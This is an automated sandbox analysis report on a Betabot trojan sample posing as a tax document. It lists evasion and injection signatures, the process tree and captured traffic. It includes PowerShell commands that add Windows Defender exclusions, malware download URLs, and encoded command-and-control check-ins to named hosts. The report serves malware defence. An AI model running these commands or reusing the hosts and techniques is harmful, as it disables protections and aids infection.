Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Analysis Report Documento--SII--33875.bin

Overview

General Information

Sample Name:Documento--SII--33875.bin (renamed file extension from bin to exe)
Analysis ID:366082
MD5:2ced2c14eece71c72c5e45e8a607bb4c
SHA1:13a700a297a7e5697d69bb743c3b256ac10a14e2
SHA256:4efd9a3fa2d25d6706213feb3299dd0f73777aad01217b9e3df046064fdbbb7e
Infos:

Most interesting Screenshot:

Detection

Betabot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Betabot
Adds a directory exclusion to Windows Defender
Contains functionality to create processes via WMI
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Internet Explorer zone settings
Overwrites Windows DLL code with PUSH RET codes
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Changes image file execution options
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Disables exception chain validation (SEHOP)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Startup

  • System is w10x64
  • Documento--SII--33875.exe (PID: 5464 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • Documento--SII--33875.exe (PID: 4948 cmdline: 'C:\Users\user\Desktop\Documento--SII--33875.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
      • explorer.exe (PID: 3696 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • iom7q73oi.exe (PID: 6152 cmdline: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe MD5: 08CDFD0D3A406601C42F087DA16EC6C8)
          • powershell.exe (PID: 5840 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\' MD5: 95000560239032BC68B4C2FDFCDEF913)
          • powershell.exe (PID: 4540 cmdline: 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\' MD5: 95000560239032BC68B4C2FDFCDEF913)
  • 9sek3aw7533q9.exe (PID: 736 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 6208 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 6576 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 6616 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 6276 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
    • 9sek3aw7533q9.exe (PID: 5704 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • 9sek3aw7533q9.exe (PID: 5236 cmdline: 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe' MD5: 2CED2C14EECE71C72C5E45E8A607BB4C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
    00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
      0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
        00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
          0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmpJoeSecurity_BetabotYara detected BetabotJoe Security
            Click to see the 24 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.CpSHySoEfzH.exe.4650000.1.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
              20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                21.2.9sek3aw7533q9.exe.2160000.1.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                  32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                    3.2.explorer.exe.2a00000.3.raw.unpackJoeSecurity_BetabotYara detected BetabotJoe Security
                      Click to see the 12 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      • AV Detection
                      • Compliance
                      • Networking
                      • System Summary
                      • Data Obfuscation
                      • Persistence and Installation Behavior
                      • Boot Survival
                      • Hooking and other Techniques for Hiding and Protection
                      • Malware Analysis System Evasion
                      • Anti Debugging
                      • HIPS / PFW / Operating System Protection Evasion
                      • Language, Device and Operating System Detection
                      • Lowering of HIPS / PFW / Operating System Security Settings
                      • Stealing of Sensitive Information
                      • Remote Access Functionality

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domain
                      Source: https://l0ioz.icu/pub/bin.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeAvira: detection malicious, Label: TR/Spy.Gen
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exeReversingLabs: Detection: 40%
                      Source: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exeReversingLabs: Detection: 46%
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeReversingLabs: Detection: 21%
                      Multi AV Scanner detection for submitted file
                      Source: Documento--SII--33875.exeVirustotal: Detection: 49%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Documento--SII--33875.exeJoe Sandbox ML: detected
                      Source: 14.1.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 2.1.Documento--SII--33875.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 3.2.explorer.exe.6870000.6.unpackAvira: Label: TR/Dropper.Gen
                      Source: 33.2.9sek3aw7533q9_1.exe.11d0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.Documento--SII--33875.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 31.2.9sek3aw7533q9.exe.1180000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.Documento--SII--33875.exe.11c0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 14.2.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 34.2.iom7q73oi.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
                      Source: 32.2.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 32.1.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 19.2.9sek3aw7533q9.exe.11e0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 21.1.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 21.2.9sek3aw7533q9.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                      Source: 34.0.iom7q73oi.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
                      Source: 11.2.9sek3aw7533q9.exe.12e0000.1.unpackAvira: Label: TR/Patched.Ren.Gen

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeUnpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: Documento--SII--33875.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: unknownHTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2018784 ET TROJAN Win32/Neurevt.A/Betabot Check-in 4 192.168.2.5:49715 -> 212.114.52.43:80
                      Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.5:49716 -> 104.21.55.228:80
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 10 Mar 2021 10:42:34 GMTServer: ApacheLast-Modified: Wed, 10 Mar 2021 05:36:15 GMTAccept-Ranges: bytesContent-Length: 680448Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ee 58 48 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 58 0a 00 00 08 00 00 00 00 00 00 ce 76 0a 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 76 0a 00 57 00 00 00 00 80 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0a 00 0c 00 00 00 c4 75 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 56 0a 00 00 20 00 00 00 58 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 80 0a 00 00 06 00 00 00 5a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0a 00 00 02 00 00 00 60 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 76 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 18 a4 09 00 ac d1 00 00 03 00 00 00 c1 01 00 06 a8 95 00 00 70 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 e1 01 00 06 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 4a 02 04 28 03 00 00 0a 00 00 02 03 28 03 00 00 06 00 2a 00 13 30 02 00 0d 00 00 00 01 00 00 11 00 02 03 73 04 00 00 06 0a 2b 00 06 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 36 02 03 04 14 14 28 09 00 00 06 00 00 2a 13 30 04 00 4c 00 00 00 02 00 00 11 73 0d 00 00 06 0a 06 0e 04 7d 03 00 00 04 02 03 04 28 04 00 00 06 00 00 05 2c 0b 06 7b 03 00 00 04 14 fe 03 2b 01 16 0b 07 2c 20 00 02 05 6f 95 00 00 06 06 fe 06 0e 00 00 06 73 04 00 00 0a 28 01 00 00 2b 28 07 00 00 06 00 00 2a 13 30 02 00 0d 00 00 00 03 00 00 11 00 02 03 73 08 00 00 06 0a 2b 00 06 2a 00 00 00 13 30 04 00 0f 00 00 00 03 00 00 11 00 02 03 04 05 73 09 00 00 06 0a 2b 00 06 2a 00 13 30 04 00 19 00 00 00 03 00 00 11 00 02 6f 02 00 00 06 02 6f 06 00 00 0a 03 04 73 09 00 00 06 0a 2b 00 06 2a 22 02 28 07 00 00 0a 00 2a 6e 03 6f b5 00 00 06 2d 11 03 02 7b 03 00 00 04 6f bb 00 00 06 14 fe 01 2b 01 16 2a 1e 02 7b 1e 00 00 04 2a 22 02 03 7d 1e 00 00 04 2a 1e 02 7
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                      Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                      Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?page=7 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 1081Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zakriasons.coCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 4727Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /old/GetDataAVK.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: estrelladamm.icuCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 6c 63 6e 65 70 67 78 69 7a 3d 35 36 30 37 35 32 31 26 6e 67 74 6d 7a 3d 37 61 39 31 62 31 65 34 30 65 30 35 65 37 34 30 26 70 6b 7a 75 6a 65 7a 3d 30 39 39 46 35 36 30 44 33 35 41 43 34 38 44 46 34 46 36 42 39 44 46 38 44 38 45 45 33 44 30 38 45 42 41 44 45 34 41 36 42 45 41 45 37 32 32 38 39 37 37 32 30 45 33 43 30 38 46 31 36 34 31 38 37 43 42 38 44 34 39 35 42 34 43 31 32 34 32 34 35 37 30 45 34 33 43 45 34 38 36 36 31 42 45 38 30 39 39 37 46 30 42 46 31 31 32 32 32 32 41 32 41 45 32 36 30 36 42 42 34 39 44 31 36 44 35 32 38 41 34 42 35 45 30 37 36 37 33 43 44 33 34 43 37 32 42 43 37 45 33 30 46 39 33 34 39 44 35 36 32 42 42 41 35 36 41 30 45 34 45 35 35 32 42 44 35 37 39 41 46 45 30 30 37 46 33 39 45 34 45 46 34 39 39 45 34 42 41 41 30 41 46 39 44 33 33 37 45 35 34 41 32 46 41 44 34 33 38 35 30 33 31 39 42 46 34 31 44 42 33 37 32 34 37 45 46 38 41 32 35 36 34 41 36 41 34 32 42 46 38 38 39 32 44 34 33 42 33 41 41 30 30 32 32 37 44 43 41 30 42 35 42 46 30 42 39 39 35 39 34 46 46 46 41 37 34 44 34 43 39 38 34 38 45 36 33 41 36 39 45 46 46 33 39 32 46 44 42 43 31 39 38 33 45 39 31 30 30 46 39 33 46 35 36 44 37 37 35 30 38 33 41 32 36 39 44 44 39 43 46 33 36 44 44 44 33 38 36 42 30 36 46 34 45 37 37 38 39 39 37 34 45 30 32 31 30 45 43 38 36 32 44 36 37 45 33 31 30 44 36 42 46 46 32 43 36 39 38 43 46 39 36 41 46 32 45 32 32 41 36 46 35 42 31 37 30 36 39 41 39 30 35 44 43 34 37 41 38 45 36 39 34 42 45 41 46 37 31 35 38 45 35 32 45 32 37 44 37 30 41 41 41 38 42 37 41 31 46 42 32 44 39 46 43 38 45 37 46 35 44 43 32 42 31 33 45 36 41 39 33 45 33 39 36 45 37 42 42 35 43 37 44 45 38 38 39 38 31 38 35 35 45 36 45 44 41 33 37 43 34 34 36 41 34 37 45 37 34 30 45 41 46 33 41 45 32 46 33 43 30 43 42 32 38 31 30 33 32 42 43 41 30 30 45 30 45 37 39 32 45 35 46 45 33 31 33 46 31 39 32 45 37 34 36 39 39 30 37 39 41 36 46 35 43 43 45 32 44 43 46 33 43 31 34 46 45 38 43 34 44 35 31 30 Data Ascii: lcnepgxiz=5607521&ngtmz=7a91b1e40e05e740&pkzujez=099F560D35AC48DF4F6B9DF8D8EE3D08EBADE4A6BEAE722897720E3C08F164187CB8D495B4C12424570E43CE48661BE80997F0BF112222A2AE2606BB49D16D528A4B5E07673CD34C72BC7E30F9349D562BBA56A0E4E552BD579AFE007F39E4EF499E4BAA0AF9D337E54A2FAD43850319BF41DB37247EF8A2564A6A42BF8892D43B3AA00227DCA0B5BF0B99594FFFA74D4C9848E63A69EFF392FDBC1983E9100F93F56D775083A269DD9CF36DDD386B06F4E7789974E0210EC862D67E310D6BFF2C698CF96AF2E22A6F5B17069A905DC47A8E694BEAF7158E52E27D70AAA8B7A1FB2D9FC8E7F5DC2B13E6A93E396E7BB5C7DE88981855E6EDA37C446A47E740EAF3AE2F3C0CB281032BCA00E0E792E5FE313F192E74699079A6F5CCE2DCF3C14FE8C4D510
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 693Cache-Control: no-cacheData Raw: 6d 79 6b 77 6f 61 3d 64 62 37 62 63 32 62 38 65 62 31 64 39 64 35 64 39 33 39 64 65 62 65 35 33 34 35 31 37 64 34 61 65 36 34 38 36 63 37 66 34 61 34 35 31 64 32 35 39 30 34 35 63 32 39 38 34 34 32 31 36 32 61 61 38 33 61 37 66 36 30 63 34 65 32 64 34 65 26 6b 75 65 6f 3d 36 30 38 34 37 33 36 32 26 6f 63 71 65 79 6d 61 6f 3d 30 34 61 64 35 64 32 62 38 64 66 34 38 64 39 33 65 39 38 63 64 64 38 32 63 65 33 35 38 34 64 62 30 65 61 61 64 38 38 39 63 65 66 34 61 62 33 31 37 39 36 32 32 36 32 37 38 34 32 63 62 31 31 65 35 37 32 65 33 63 30 66 30 37 63 38 39 65 30 36 62 63 64 31 35 30 63 34 32 35 61 65 64 39 61 39 64 35 63 36 32 62 32 35 36 65 39 37 34 30 32 33 34 62 38 30 64 61 35 30 32 61 31 65 34 36 65 30 64 65 34 63 35 64 34 30 63 32 36 31 39 38 35 32 35 35 64 39 33 39 39 65 62 66 35 39 36 38 63 63 35 34 64 39 62 30 35 37 35 65 35 36 66 39 30 62 37 65 35 35 31 33 39 62 32 30 62 66 64 64 33 61 63 62 64 64 36 61 34 36 39 31 32 36 30 33 37 36 63 31 64 62 34 65 30 39 35 34 35 65 39 33 33 39 62 35 37 39 39 37 32 39 65 66 66 37 39 35 64 34 65 61 63 36 33 61 38 33 35 38 39 32 66 63 37 39 37 33 39 34 34 61 64 30 32 35 61 33 31 37 39 39 36 63 30 34 32 34 65 66 63 64 39 36 65 30 62 61 37 31 65 39 35 34 37 66 65 64 32 35 34 64 38 33 66 38 30 34 30 63 63 36 35 39 33 31 35 35 30 30 61 63 35 61 30 36 36 61 35 35 30 63 64 36 64 33 30 30 30 34 30 39 62 38 36 31 63 64 39 37 64 36 62 30 65 63 65 37 32 35 33 39 37 66 33 30 38 61 34 31 32 39 36 33 36 33 66 36 39 39 65 30 63 34 39 63 61 32 33 65 31 34 62 39 38 35 31 65 30 66 64 37 36 35 33 36 31 35 34 61 64 66 32 35 63 63 39 66 63 31 31 31 30 61 33 63 34 37 35 37 66 34 64 37 30 32 30 38 33 30 31 34 66 61 39 30 62 35 35 63 65 39 61 33 38 39 62 38 64 63 62 65 37 36 33 33 62 37 31 37 61 31 64 35 64 66 32 61 31 39 31 38 31 36 64 39 39 66 31 38 30 63 61 34 66 62 64 64 66 33 35 38 62 31 30 66 39 36 34 37 63 37 37 63 62 65 38 33 31 30 62 64 34 61 30 32 65 31 39 30 63 32 35 62 36 64 36 62 61 66 38 30 38 36 63 66 32 34 65 66 39 66 39 36 66 34 35 31 39 32 66 36 65 63 35 30 31 31 32 34 38 35 30 33 64 38 61 32 61 32 61 30 35 30 Data Ascii: mykwoa=db7bc2b8eb1d9d5d939debe534517d4ae6486c7f4a451d259045c298442162aa83a7f60c4e2d4e&kueo=60847362&ocqeymao=04ad5d2b8df48d93e98cdd82ce3584db0eaad889cef4ab3179622627842cb11e572e3c0f07c89e06bcd150c425aed9a9d5c62b256e9740234b80da502a1e46e0de4c5d40c261985255d9399ebf5968cc54d9b0575e56f90b7e55139b20bfdd3acbdd6a4691260376c1db4e09545e9339b5799729eff795d4eac63a835892fc7973944ad025a317996c0424efcd96e0ba71e9547fed254d83f8040cc659315500ac5a066a550cd6d3000409b861cd97d6b0ece725397f308a41296363f699e0c49ca23e14b9851e0fd76536154adf25cc9fc1110a3c4757f4d702083014fa90b55ce9a389b8dcbe7633b717a1d5df2a191816d99f180ca4fbddf358b10f9647c77cbe8310bd4a02e190c25b6d6baf8086cf24ef9f96
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=1809723 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 664Cache-Control: no-cacheData Raw: 78 75 72 6f 6c 3d 32 31 36 30 36 31 32 37 26 7a 79 78 77 76 75 74 3d 37 30 42 34 32 32 31 39 31 43 31 38 45 43 42 32 46 37 43 38 38 45 30 43 34 44 46 36 42 30 43 42 39 45 35 37 38 34 30 41 35 36 32 45 34 43 26 62 63 64 65 66 67 68 69 6a 3d 41 35 45 38 34 38 44 38 42 41 45 43 46 37 34 32 36 37 36 45 35 34 44 35 44 36 39 37 46 41 36 43 46 34 37 42 41 37 42 31 38 41 38 35 43 45 35 37 32 32 45 42 43 32 41 31 35 41 31 45 36 43 30 45 44 31 39 39 37 33 46 39 30 39 37 38 39 44 32 31 36 32 35 35 43 45 33 42 30 30 42 46 41 43 33 43 45 46 46 36 35 30 46 39 44 34 38 42 45 46 43 36 30 42 43 45 44 33 35 35 34 44 32 36 39 43 42 46 31 41 33 36 36 32 36 33 34 30 37 42 44 34 41 31 31 41 42 35 31 37 30 33 43 45 42 46 35 31 42 46 42 46 45 36 37 42 42 42 42 36 46 39 31 38 44 42 39 46 45 31 44 39 34 35 39 35 31 42 35 44 45 35 32 39 33 46 38 31 36 37 32 36 41 31 42 32 36 39 46 31 43 38 41 44 30 41 43 41 42 35 34 34 43 45 44 34 35 36 43 31 41 37 36 42 34 46 31 46 44 39 46 38 46 43 44 31 41 45 45 38 41 38 36 34 43 37 36 36 31 36 30 42 37 43 43 46 39 30 44 38 41 33 32 36 38 30 31 39 39 31 42 44 33 46 30 38 46 30 34 37 31 32 41 31 43 30 46 33 37 33 34 33 34 32 42 32 43 36 31 37 44 35 37 33 41 44 41 31 35 42 46 31 42 34 30 45 45 38 45 38 30 44 32 42 34 41 32 44 41 38 39 38 46 41 42 36 35 41 44 43 39 41 41 36 38 41 39 34 41 39 32 31 33 41 32 46 43 45 36 35 46 36 39 37 37 45 42 33 38 41 41 45 41 34 30 30 45 36 34 36 30 35 38 41 39 44 39 37 39 34 30 45 34 32 46 39 43 30 32 44 35 45 30 38 33 35 44 46 46 46 37 34 38 38 39 42 34 37 36 43 43 34 36 45 34 45 33 36 31 38 45 37 30 38 37 45 38 35 44 44 39 39 44 33 36 31 46 39 45 34 39 34 42 46 30 38 42 31 39 42 38 36 32 42 42 46 45 41 43 42 45 45 45 37 41 38 45 36 41 43 36 30 34 39 30 35 31 39 45 34 33 30 31 38 30 31 33 31 30 43 42 33 31 33 43 32 36 42 36 46 33 36 46 38 31 37 44 35 34 30 46 41 32 35 36 34 37 35 31 46 30 45 33 44 46 43 32 46 35 39 45 44 31 38 35 37 43 45 46 38 45 32 44 32 44 42 36 46 43 39 44 41 46 43 36 46 31 32 31 35 31 42 30 36 Data Ascii: xurol=21606127&zyxwvut=70B422191C18ECB2F7C88E0C4DF6B0CB9E57840A562E4C&bcdefghij=A5E848D8BAECF742676E54D5D697FA6CF47BA7B18A85CE5722EBC2A15A1E6C0ED19973F909789D216255CE3B00BFAC3CEFF650F9D48BEFC60BCED3554D269CBF1A366263407BD4A11AB51703CEBF51BFBFE67BBBB6F918DB9FE1D945951B5DE5293F816726A1B269F1C8AD0ACAB544CED456C1A76B4F1FD9F8FCD1AEE8A864C766160B7CCF90D8A326801991BD3F08F04712A1C0F3734342B2C617D573ADA15BF1B40EE8E80D2B4A2DA898FAB65ADC9AA68A94A9213A2FCE65F6977EB38AAEA400E646058A9D97940E42F9C02D5E0835DFFF74889B476CC46E4E3618E7087E85DD99D361F9E494BF08B19B862BBFEACBEEE7A8E6AC60490519E4301801310CB313C26B6F36F817D540FA2564751F0E3DFC2F59ED1857CEF8E2D2DB6FC9DAFC6F12151B06
